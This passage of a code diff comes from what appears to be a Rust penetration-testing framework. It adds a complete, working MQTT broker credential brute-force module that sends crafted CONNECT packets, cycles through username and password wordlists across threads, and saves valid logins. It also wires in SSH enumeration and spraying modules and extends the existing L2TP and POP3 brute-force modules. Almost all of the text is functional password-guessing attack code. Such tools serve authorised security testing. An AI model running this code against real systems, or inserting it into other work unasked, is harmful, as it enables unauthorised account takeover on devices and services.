println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone).green().bold());
|
||||
let mut found = found_credentials_clone.lock().await;
|
||||
found.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_on_success_flag {
|
||||
stop_signal_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone));
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
|
||||
stats_clone.record_attempt(false, true);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {}: error: {}", addr_clone, e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(permit);
|
||||
@@ -199,6 +306,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let found_credentials_clone = Arc::clone(&found_credentials);
|
||||
let stop_signal_clone = Arc::clone(&stop_signal);
|
||||
let semaphore_clone = Arc::clone(&semaphore);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let verbose_flag = verbose;
|
||||
let stop_on_success_flag = stop_on_success;
|
||||
|
||||
@@ -216,18 +324,25 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
match try_l2tp_login(&addr_clone, &user, &pass_clone, &psk_clone, timeout_duration).await {
|
||||
Ok(true) => {
|
||||
println!("[+] {} -> {}:{}", addr_clone, user, pass_clone);
|
||||
println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user, pass_clone).green().bold());
|
||||
let mut found = found_credentials_clone.lock().await;
|
||||
found.push((addr_clone.clone(), user.clone(), pass_clone.clone()));
|
||||
stats_clone.record_attempt(true, false);
|
||||
if stop_on_success_flag {
|
||||
stop_signal_clone.store(true, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user, pass_clone));
|
||||
stats_clone.record_attempt(false, false);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[-] {} -> {}:{}", addr_clone, user, pass_clone).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
|
||||
stats_clone.record_attempt(false, true);
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {}: error: {}", addr_clone, e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(permit);
|
||||
@@ -248,15 +363,24 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
// Wait for remaining tasks
|
||||
while let Some(res) = tasks.next().await {
|
||||
if let Err(e) = res {
|
||||
log(verbose, &format!("[!] Task join error: {}", e));
|
||||
if verbose {
|
||||
println!("\r{}", format!("[!] Task join error: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Stop progress reporter
|
||||
stop_signal.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
|
||||
let creds = found_credentials.lock().await;
|
||||
if creds.is_empty() {
|
||||
println!("\n[-] No credentials found.");
|
||||
println!("{}", "[-] No credentials found.".yellow());
|
||||
} else {
|
||||
println!("\n[+] Valid credentials found:");
|
||||
println!("{}", format!("[+] Found {} valid credential(s):", creds.len()).green().bold());
|
||||
for (host_addr, user, pass) in creds.iter() {
|
||||
println!(" {} -> {}:{}", host_addr, user, pass);
|
||||
}
|
||||
|
||||
@@ -4,6 +4,8 @@
|
||||
pub mod ftp_anonymous;
|
||||
pub mod telnet_bruteforce;
|
||||
pub mod ssh_bruteforce;
|
||||
pub mod ssh_user_enum;
|
||||
pub mod ssh_spray;
|
||||
pub mod rtsp_bruteforce_advanced;
|
||||
pub mod rdp_bruteforce;
|
||||
pub mod enablebruteforce;
|
||||
@@ -12,3 +14,4 @@
|
||||
pub mod snmp_bruteforce;
|
||||
pub mod fortinet_bruteforce;
|
||||
pub mod l2tp_bruteforce;
|
||||
pub mod mqtt_bruteforce;
|
||||
|
||||
@@ -0,0 +1,591 @@
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use regex::Regex;
|
||||
use std::fs::{File, OpenOptions};
|
||||
use std::io::{self, BufRead, BufReader, Write};
|
||||
use std::net::{TcpStream, ToSocketAddrs};
|
||||
use std::path::Path;
|
||||
use std::sync::{Arc, Mutex};
|
||||
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
|
||||
use std::time::{Duration, Instant};
|
||||
use threadpool::ThreadPool;
|
||||
use crossbeam_channel::unbounded;
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
const MQTT_CONNECT_TIMEOUT_MS: u64 = 3000;
|
||||
const MQTT_READ_TIMEOUT_MS: u64 = 2000;
|
||||
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_final(&self) {
|
||||
println!();
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
|
||||
println!("{}", "=== Statistics ===".bold());
|
||||
println!(" Total attempts: {}", total);
|
||||
println!(" Successful: {}", success.to_string().green().bold());
|
||||
println!(" Failed: {}", failed);
|
||||
println!(" Errors: {}", errors.to_string().red());
|
||||
println!(" Elapsed time: {:.2}s", elapsed);
|
||||
if elapsed > 0.0 {
|
||||
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ MQTT Brute Force Module ║".cyan());
|
||||
println!("{}", "║ Tests MQTT broker authentication ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
#[derive(Clone)]
|
||||
struct MqttBruteforceConfig {
|
||||
target: String,
|
||||
port: u16,
|
||||
username_wordlist: String,
|
||||
password_wordlist: String,
|
||||
threads: usize,
|
||||
stop_on_success: bool,
|
||||
verbose: bool,
|
||||
full_combo: bool,
|
||||
client_id: String,
|
||||
}
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
println!();
|
||||
let port = prompt_port(1883);
|
||||
let username_wordlist = prompt_wordlist("Username wordlist file: ")?;
|
||||
let password_wordlist = prompt_wordlist("Password wordlist file: ")?;
|
||||
let threads = prompt_threads(8);
|
||||
let stop_on_success = prompt_yes_no("Stop on first valid login?", true);
|
||||
let full_combo = prompt_yes_no("Try every username with every password?", false);
|
||||
let verbose = prompt_yes_no("Verbose mode?", false);
|
||||
let client_id = prompt_default("MQTT Client ID", "rustsploit_client");
|
||||
|
||||
let config = MqttBruteforceConfig {
|
||||
target: target.to_string(),
|
||||
port,
|
||||
username_wordlist,
|
||||
password_wordlist,
|
||||
threads,
|
||||
stop_on_success,
|
||||
verbose,
|
||||
full_combo,
|
||||
client_id,
|
||||
};
|
||||
run_mqtt_bruteforce(config)
|
||||
}
|
||||
|
||||
fn run_mqtt_bruteforce(config: MqttBruteforceConfig) -> Result<()> {
|
||||
let addr = normalize_target(&config.target, config.port)?;
|
||||
let usernames = read_lines(&config.username_wordlist)?;
|
||||
let passwords = read_lines(&config.password_wordlist)?;
|
||||
if usernames.is_empty() || passwords.is_empty() {
|
||||
return Err(anyhow!("Username or password wordlist is empty."));
|
||||
}
|
||||
println!("{}", format!("[*] Loaded {} username(s).", usernames.len()).cyan());
|
||||
println!("{}", format!("[*] Loaded {} password(s).", passwords.len()).cyan());
|
||||
|
||||
let total_attempts = if config.full_combo {
|
||||
usernames.len() * passwords.len()
|
||||
} else {
|
||||
passwords.len()
|
||||
};
|
||||
println!("{}", format!("[*] Total attempts: {}", total_attempts).cyan());
|
||||
println!();
|
||||
|
||||
let found = Arc::new(Mutex::new(Vec::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::new()));
|
||||
let stop_flag = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let pool = ThreadPool::new(config.threads);
|
||||
let (tx, rx) = unbounded();
|
||||
if config.full_combo {
|
||||
for u in &usernames {
|
||||
for p in &passwords {
|
||||
tx.send((u.clone(), p.clone())).map_err(|e| anyhow!("Channel send error: {}", e))?;
|
||||
}
|
||||
}
|
||||
} else if usernames.len() == 1 {
|
||||
for p in &passwords {
|
||||
tx.send((usernames[0].clone(), p.clone())).map_err(|e| anyhow!("Channel send error: {}", e))?;
|
||||
}
|
||||
} else if passwords.len() == 1 {
|
||||
for u in &usernames {
|
||||
tx.send((u.clone(), passwords[0].clone())).map_err(|e| anyhow!("Channel send error: {}", e))?;
|
||||
}
|
||||
} else {
|
||||
for p in &passwords {
|
||||
tx.send((usernames[0].clone(), p.clone())).map_err(|e| anyhow!("Channel send error: {}", e))?;
|
||||
}
|
||||
}
|
||||
drop(tx);
|
||||
|
||||
// Start progress reporter thread
|
||||
let progress_stop = Arc::clone(&stop_flag);
|
||||
let progress_stats = Arc::clone(&stats);
|
||||
let progress_handle = std::thread::spawn(move || {
|
||||
while !progress_stop.load(Ordering::Relaxed) {
|
||||
progress_stats.print_progress();
|
||||
std::thread::sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS));
|
||||
}
|
||||
});
|
||||
|
||||
for _ in 0..config.threads {
|
||||
let rx = rx.clone();
|
||||
let addr = addr.clone();
|
||||
let stop_flag = Arc::clone(&stop_flag);
|
||||
let found = Arc::clone(&found);
|
||||
let unknown = Arc::clone(&unknown);
|
||||
let stats = Arc::clone(&stats);
|
||||
let config = config.clone();
|
||||
pool.execute(move || {
|
||||
while let Ok((user, pass)) = rx.recv() {
|
||||
if stop_flag.load(Ordering::Relaxed) {
|
||||
break;
|
||||
}
|
||||
match try_mqtt_login(&addr, &user, &pass, &config.client_id) {
|
||||
Ok(true) => {
|
||||
println!("\r{}", format!("[+] VALID: {}:{}", user, pass).green().bold());
|
||||
let mut creds = found.lock().unwrap();
|
||||
creds.push((user.clone(), pass.clone()));
|
||||
stats.record_attempt(true, false);
|
||||
if config.stop_on_success {
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
// Drain remaining items from channel
|
||||
while rx.try_recv().is_ok() {}
|
||||
break;
|
||||
}
|
||||
}
|
||||
Ok(false) => {
|
||||
stats.record_attempt(false, false);
|
||||
if config.verbose {
|
||||
println!("\r{}", format!("[-] Failed: {}:{}", user, pass).dimmed());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
stats.record_attempt(false, true);
|
||||
let msg = e.to_string();
|
||||
{
|
||||
let mut unk = unknown.lock().unwrap();
|
||||
unk.push((user.clone(), pass.clone(), msg.clone()));
|
||||
}
|
||||
if config.verbose {
|
||||
eprintln!("\r{}", format!("[?] {}:{} -> {}", user, pass, msg).yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
pool.join();
|
||||
|
||||
// Stop progress reporter
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.join();
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
let found_guard = found.lock().unwrap();
|
||||
if found_guard.is_empty() {
|
||||
println!("{}", "[-] No valid credentials found.".yellow());
|
||||
} else {
|
||||
println!("{}", format!("[+] Found {} valid credential(s):", found_guard.len()).green().bold());
|
||||
for (u, p) in found_guard.iter() {
|
||||
println!(" {} {}:{}", "✓".green(), u, p);
|
||||
}
|
||||
if prompt("\nSave found credentials? (y/n): ").trim().eq_ignore_ascii_case("y") {
|
||||
let f = prompt("What should the valid results be saved as?: ");
|
||||
if !f.trim().is_empty() {
|
||||
save_results(&f, &found_guard)?;
|
||||
println!("{}", format!("[+] Results saved to {}", f).green());
|
||||
} else {
|
||||
println!("{}", "[-] Filename cannot be empty. Skipping save.".yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
drop(found_guard);
|
||||
|
||||
let unknown_guard = unknown.lock().unwrap();
|
||||
if !unknown_guard.is_empty() {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[?] Collected {} unknown/errored MQTT responses.",
|
||||
unknown_guard.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
if prompt("Save unknown responses to file? (y/n): ")
|
||||
.trim()
|
||||
.eq_ignore_ascii_case("y")
|
||||
{
|
||||
let default_name = "mqtt_bruteforce_unknown.txt";
|
||||
let fname = prompt(&format!(
|
||||
"What should the unknown results be saved as? [{}]: ",
|
||||
default_name
|
||||
));
|
||||
let chosen = if fname.trim().is_empty() {
|
||||
default_name.to_string()
|
||||
} else {
|
||||
fname.trim().to_string()
|
||||
};
|
||||
if let Err(e) = save_unknown_mqtt(&chosen, &unknown_guard) {
|
||||
println!("{}", format!("[!] Failed to save unknown responses: {}", e).red());
|
||||
} else {
|
||||
println!("{}", format!("[+] Unknown responses saved to {}", chosen).green());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Try MQTT CONNECT with username/password
|
||||
/// Returns Ok(true) if connection accepted, Ok(false) if auth failed, Err on connection/protocol error
|
||||
fn try_mqtt_login(addr: &str, username: &str, password: &str, client_id: &str) -> Result<bool> {
|
||||
let socket = addr.to_socket_addrs()?
|
||||
.next()
|
||||
.ok_or_else(|| anyhow!("Could not resolve address"))?;
|
||||
|
||||
let mut stream = TcpStream::connect_timeout(
|
||||
&socket,
|
||||
Duration::from_millis(MQTT_CONNECT_TIMEOUT_MS)
|
||||
)
|
||||
.context("Connection timeout")?;
|
||||
|
||||
stream.set_read_timeout(Some(Duration::from_millis(MQTT_READ_TIMEOUT_MS)))
|
||||
.map_err(|e| anyhow!("Failed to set read timeout: {}", e))?;
|
||||
stream.set_write_timeout(Some(Duration::from_millis(MQTT_READ_TIMEOUT_MS)))
|
||||
.map_err(|e| anyhow!("Failed to set write timeout: {}", e))?;
|
||||
|
||||
// Build MQTT CONNECT packet
|
||||
let mut packet = Vec::new();
|
||||
|
||||
// Fixed header: CONNECT (0x10), remaining length will be set later
|
||||
packet.push(0x10); // CONNECT packet type
|
||||
|
||||
// Variable header: Protocol name + version + flags + keep alive
|
||||
let protocol_name = b"MQTT";
|
||||
let protocol_level = 0x04; // MQTT 3.1.1
|
||||
|
||||
// Username flag (bit 7) and Password flag (bit 6) in connect flags
|
||||
let connect_flags = 0xC0; // 0b11000000 = username + password flags set
|
||||
let keep_alive: u16 = 60; // 60 seconds
|
||||
|
||||
// Calculate variable header length
|
||||
let mut var_header = Vec::new();
|
||||
var_header.extend_from_slice(&(protocol_name.len() as u16).to_be_bytes());
|
||||
var_header.extend_from_slice(protocol_name);
|
||||
var_header.push(protocol_level);
|
||||
var_header.push(connect_flags);
|
||||
var_header.extend_from_slice(&keep_alive.to_be_bytes());
|
||||
|
||||
// Payload: Client ID, Username, Password
|
||||
let mut payload = Vec::new();
|
||||
|
||||
// Client ID (UTF-8 string, 2 bytes length + data)
|
||||
let client_id_bytes = client_id.as_bytes();
|
||||
payload.extend_from_slice(&(client_id_bytes.len() as u16).to_be_bytes());
|
||||
payload.extend_from_slice(client_id_bytes);
|
||||
|
||||
// Username (UTF-8 string, 2 bytes length + data)
|
||||
let username_bytes = username.as_bytes();
|
||||
payload.extend_from_slice(&(username_bytes.len() as u16).to_be_bytes());
|
||||
payload.extend_from_slice(username_bytes);
|
||||
|
||||
// Password (UTF-8 string, 2 bytes length + data)
|
||||
let password_bytes = password.as_bytes();
|
||||
payload.extend_from_slice(&(password_bytes.len() as u16).to_be_bytes());
|
||||
payload.extend_from_slice(password_bytes);
|
||||
|
||||
// Calculate remaining length (variable header + payload)
|
||||
let remaining_length = var_header.len() + payload.len();
|
||||
|
||||
// Encode remaining length (MQTT variable length encoding)
|
||||
let mut remaining_length_bytes = Vec::new();
|
||||
let mut x = remaining_length;
|
||||
loop {
|
||||
let mut byte = (x % 128) as u8;
|
||||
x /= 128;
|
||||
if x > 0 {
|
||||
byte |= 0x80;
|
||||
}
|
||||
remaining_length_bytes.push(byte);
|
||||
if x == 0 {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
// Build complete packet
|
||||
packet.extend_from_slice(&remaining_length_bytes);
|
||||
packet.extend_from_slice(&var_header);
|
||||
packet.extend_from_slice(&payload);
|
||||
|
||||
// Send CONNECT packet
|
||||
use std::io::Write;
|
||||
stream.write_all(&packet)
|
||||
.context("Failed to send CONNECT packet")?;
|
||||
stream.flush()
|
||||
.context("Failed to flush CONNECT packet")?;
|
||||
|
||||
// Read CONNACK response
|
||||
use std::io::Read;
|
||||
let mut response = [0u8; 4];
|
||||
let n = stream.read(&mut response)
|
||||
.context("Failed to read CONNACK response")?;
|
||||
|
||||
if n < 2 {
|
||||
return Err(anyhow!("CONNACK response too short"));
|
||||
}
|
||||
|
||||
// Check packet type (should be 0x20 = CONNACK)
|
||||
if response[0] != 0x20 {
|
||||
return Err(anyhow!("Expected CONNACK (0x20), got 0x{:02x}", response[0]));
|
||||
}
|
||||
|
||||
// Check return code (byte 3 in variable header)
|
||||
if n >= 4 {
|
||||
let return_code = response[3];
|
||||
match return_code {
|
||||
0x00 => {
|
||||
// Success - send DISCONNECT and return true
|
||||
let disconnect = vec![0xE0, 0x00]; // DISCONNECT packet
|
||||
stream.write_all(&disconnect).ok();
|
||||
stream.flush().ok();
|
||||
return Ok(true);
|
||||
}
|
||||
0x04 => {
|
||||
// Bad username or password
|
||||
return Ok(false);
|
||||
}
|
||||
0x05 => {
|
||||
// Not authorized
|
||||
return Ok(false);
|
||||
}
|
||||
_ => {
|
||||
return Err(anyhow!("CONNACK return code: 0x{:02x}", return_code));
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// If we didn't get enough bytes, assume failure
|
||||
return Ok(false);
|
||||
}
|
||||
}
|
||||
|
||||
fn read_lines(path: &str) -> Result<Vec<String>> {
|
||||
let file = File::open(path)
|
||||
.context(format!("Failed to open file: {}", path))?;
|
||||
Ok(BufReader::new(file)
|
||||
.lines()
|
||||
.filter_map(Result::ok)
|
||||
.filter(|s| !s.trim().is_empty())
|
||||
.collect())
|
||||
}
|
||||
|
||||
fn save_results(path: &str, creds: &[(String, String)]) -> Result<()> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.write(true)
|
||||
.truncate(true)
|
||||
.open(path)
|
||||
.context(format!("Failed to create file: {}", path))?;
|
||||
for (u, p) in creds {
|
||||
writeln!(file, "{}:{}", u, p)
|
||||
.context(format!("Failed to write to file: {}", path))?;
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn save_unknown_mqtt(path: &str, entries: &[(String, String, String)]) -> Result<()> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.write(true)
|
||||
.truncate(true)
|
||||
.open(path)
|
||||
.context(format!("Failed to create file: {}", path))?;
|
||||
|
||||
writeln!(file, "# MQTT Bruteforce Unknown/Errored Responses")
|
||||
.context(format!("Failed to write to file: {}", path))?;
|
||||
writeln!(file, "# Format: username:password - error/response")
|
||||
.context(format!("Failed to write to file: {}", path))?;
|
||||
writeln!(file)
|
||||
.context(format!("Failed to write to file: {}", path))?;
|
||||
|
||||
for (user, pass, msg) in entries {
|
||||
writeln!(file, "{}:{} - {}", user, pass, msg)
|
||||
.context(format!("Failed to write to file: {}", path))?;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn prompt(msg: &str) -> String {
|
||||
print!("{}", msg);
|
||||
if let Err(e) = io::stdout().flush() {
|
||||
eprintln!("[!] Failed to flush stdout: {}", e);
|
||||
}
|
||||
let mut b = String::new();
|
||||
match io::stdin().read_line(&mut b) {
|
||||
Ok(_) => b.trim().to_string(),
|
||||
Err(e) => {
|
||||
eprintln!("[!] Failed to read input: {}", e);
|
||||
String::new()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_default(msg: &str, default: &str) -> String {
|
||||
let input = prompt(&format!("{} [{}]: ", msg, default));
|
||||
if input.trim().is_empty() {
|
||||
default.to_string()
|
||||
} else {
|
||||
input.trim().to_string()
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_port(default: u16) -> u16 {
|
||||
loop {
|
||||
let input = prompt(&format!("Port (default {}): ", default));
|
||||
if input.is_empty() {
|
||||
return default;
|
||||
}
|
||||
match input.parse::<u16>() {
|
||||
Ok(0) => println!("[!] Port cannot be zero. Please enter a value between 1 and 65535."),
|
||||
Ok(port) => return port,
|
||||
Err(_) => println!("[!] Invalid port. Please enter a number between 1 and 65535."),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_threads(default: usize) -> usize {
|
||||
loop {
|
||||
let input = prompt(&format!("Threads (default {}): ", default));
|
||||
if input.is_empty() {
|
||||
return default.max(1);
|
||||
}
|
||||
if let Ok(value) = input.parse::<usize>() {
|
||||
if value >= 1 && value <= 1024 {
|
||||
return value;
|
||||
}
|
||||
}
|
||||
println!("[!] Invalid thread count. Please enter a value between 1 and 1024.");
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default_yes: bool) -> bool {
|
||||
let default_char = if default_yes { "y" } else { "n" };
|
||||
loop {
|
||||
let input = prompt(&format!("{} (y/n) [{}]: ", message, default_char));
|
||||
if input.is_empty() {
|
||||
return default_yes;
|
||||
}
|
||||
match input.to_lowercase().as_str() {
|
||||
"y" | "yes" => return true,
|
||||
"n" | "no" => return false,
|
||||
_ => println!("[!] Please respond with y or n."),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_wordlist(message: &str) -> Result<String> {
|
||||
loop {
|
||||
let response = prompt(message);
|
||||
if response.is_empty() {
|
||||
println!("[!] Path cannot be empty.");
|
||||
continue;
|
||||
}
|
||||
let trimmed = response.trim();
|
||||
if Path::new(trimmed).is_file() {
|
||||
return Ok(trimmed.to_string());
|
||||
} else {
|
||||
println!(
|
||||
"{}",
|
||||
format!("File '{}' does not exist or is not a regular file.", trimmed).yellow()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn normalize_target(host: &str, port: u16) -> Result<String> {
|
||||
let re = Regex::new(r"^\[*([^\]]+?)\]*(?::(\d{1,5}))?$")
|
||||
.map_err(|e| anyhow!("Regex compilation error: {}", e))?;
|
||||
let t = host.trim();
|
||||
let cap = re.captures(t)
|
||||
.ok_or_else(|| anyhow!("Invalid target format: {}", host))?;
|
||||
let addr = cap.get(1)
|
||||
.ok_or_else(|| anyhow!("Invalid target: {}", host))?
|
||||
.as_str();
|
||||
let p = cap.get(2)
|
||||
.map(|m| m.as_str().parse::<u16>().ok())
|
||||
.flatten()
|
||||
.unwrap_or(port);
|
||||
let f = if addr.contains(':') && !addr.starts_with('[') {
|
||||
format!("[{}]:{}", addr, p)
|
||||
} else {
|
||||
format!("{}:{}", addr, p)
|
||||
};
|
||||
if f.to_socket_addrs()?.next().is_none() {
|
||||
Err(anyhow!("DNS resolution failed: {}", f))
|
||||
} else {
|
||||
Ok(f)
|
||||
}
|
||||
}
|
||||
@@ -454,6 +454,7 @@ fn run_pop3_bruteforce(config: Pop3BruteforceConfig) -> Result<()> {
|
||||
initialize_output_file(&config)?;
|
||||
|
||||
let found = Arc::new(Mutex::new(HashSet::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::<(String, String, String)>::new()));
|
||||
let stop_flag = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let output_file = Arc::new(config.output_file.clone());
|
||||
@@ -489,6 +490,7 @@ fn run_pop3_bruteforce(config: Pop3BruteforceConfig) -> Result<()> {
|
||||
host,
|
||||
stop_flag.clone(),
|
||||
found.clone(),
|
||||
unknown.clone(),
|
||||
output_file,
|
||||
stats.clone(),
|
||||
);
|
||||
@@ -497,7 +499,7 @@ fn run_pop3_bruteforce(config: Pop3BruteforceConfig) -> Result<()> {
|
||||
stop_flag.store(true, Ordering::Relaxed);
|
||||
|
||||
stats.print_final();
|
||||
print_final_report(&found, &config.output_file);
|
||||
print_final_report(&found, &unknown, &config.output_file);
|
||||
|
||||
Ok(())
|
||||
}
|
||||
@@ -682,6 +684,7 @@ fn spawn_workers(
|
||||
host: String,
|
||||
stop_flag: Arc<AtomicBool>,
|
||||
found: Arc<Mutex<HashSet<(String, String)>>>,
|
||||
unknown: Arc<Mutex<Vec<(String, String, String)>>>,
|
||||
output_file: Arc<String>,
|
||||
stats: Arc<Statistics>,
|
||||
) {
|
||||
@@ -691,6 +694,7 @@ fn spawn_workers(
|
||||
let host = host.clone();
|
||||
let stop_flag = stop_flag.clone();
|
||||
let found = found.clone();
|
||||
let unknown = unknown.clone();
|
||||
let output_file = output_file.clone();
|
||||
let stats = stats.clone();
|
||||
let config = config.clone();
|
||||
@@ -704,6 +708,7 @@ fn spawn_workers(
|
||||
&config,
|
||||
&stop_flag,
|
||||
&found,
|
||||
&unknown,
|
||||
&output_file,
|
||||
&stats,
|
||||
);
|
||||
@@ -719,6 +724,7 @@ fn worker_loop(
|
||||
config: &Pop3BruteforceConfig,
|
||||
stop_flag: &Arc<AtomicBool>,
|
||||
found: &Arc<Mutex<HashSet<(String, String)>>>,
|
||||
unknown: &Arc<Mutex<Vec<(String, String, String)>>>,
|
||||
output_file: &str,
|
||||
stats: &Arc<Statistics>,
|
||||
) {
|
||||
@@ -746,6 +752,7 @@ fn worker_loop(
|
||||
config,
|
||||
stop_flag,
|
||||
found,
|
||||
unknown,
|
||||
output_file,
|
||||
stats,
|
||||
&rx,
|
||||
@@ -797,6 +804,7 @@ fn process_login_result(
|
||||
config: &Pop3BruteforceConfig,
|
||||
stop_flag: &Arc<AtomicBool>,
|
||||
found: &Arc<Mutex<HashSet<(String, String)>>>,
|
||||
unknown: &Arc<Mutex<Vec<(String, String, String)>>>,
|
||||
output_file: &str,
|
||||
stats: &Arc<Statistics>,
|
||||
rx: &crossbeam_channel::Receiver<(String, String)>,
|
||||
@@ -832,14 +840,23 @@ fn process_login_result(
|
||||
}
|
||||
Err(e) => {
|
||||
stats.record_attempt(false, true);
|
||||
let msg = e.to_string();
|
||||
{
|
||||
let mut unk = unknown.lock().unwrap();
|
||||
unk.push((user.to_string(), pass.to_string(), msg.clone()));
|
||||
}
|
||||
if config.verbose {
|
||||
eprintln!("{} Error ({}): {}:{}", "[!]".yellow(), e, user, pass);
|
||||
eprintln!("{} Error/unknown ({}): {}:{}", "[?]".yellow(), msg, user, pass);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn print_final_report(found: &Arc<Mutex<HashSet<(String, String)>>>, output_file: &str) {
|
||||
fn print_final_report(
|
||||
found: &Arc<Mutex<HashSet<(String, String)>>>,
|
||||
unknown: &Arc<Mutex<Vec<(String, String, String)>>>,
|
||||
output_file: &str,
|
||||
) {
|
||||
let found = found.lock().unwrap();
|
||||
println!();
|
||||
if found.is_empty() {
|
||||
@@ -851,7 +868,39 @@ fn print_final_report(found: &Arc<Mutex<HashSet<(String, String)>>>, output_file
|
||||
for (u, p) in sorted.iter() {
|
||||
println!(" {} {}:{}", "✓".green(), u, p);
|
||||
}
|
||||
println!("\n[*] All results saved to: {}", output_file);
|
||||
println!("\n[*] All valid results saved to: {}", output_file);
|
||||
}
|
||||
|
||||
drop(found);
|
||||
|
||||
let unknown_guard = unknown.lock().unwrap();
|
||||
if !unknown_guard.is_empty() {
|
||||
